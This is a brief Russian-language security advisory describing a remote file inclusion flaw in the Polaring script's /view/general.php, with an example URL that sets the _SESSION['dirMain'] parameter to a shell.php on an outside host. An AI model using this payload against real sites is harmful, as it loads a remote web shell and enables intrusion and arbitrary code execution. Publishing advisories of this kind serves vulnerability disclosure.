Программа: Polaring

Обнаруженная уязвимость в Polaring может быть использована злоумышленником для выполнения произвольного кода. Уязвимость возникает из-за того, что входные данные, передаваемые через «_SESSION[‘dirMain’]», не корректно обрабатываются в /view/general.php.

Пример:

http://www.site.com/polaring_dir/view/general.php?_SESSION[‘dirMain’] =http://marcusbestlamer.gay/shell.php?



Оставить мнение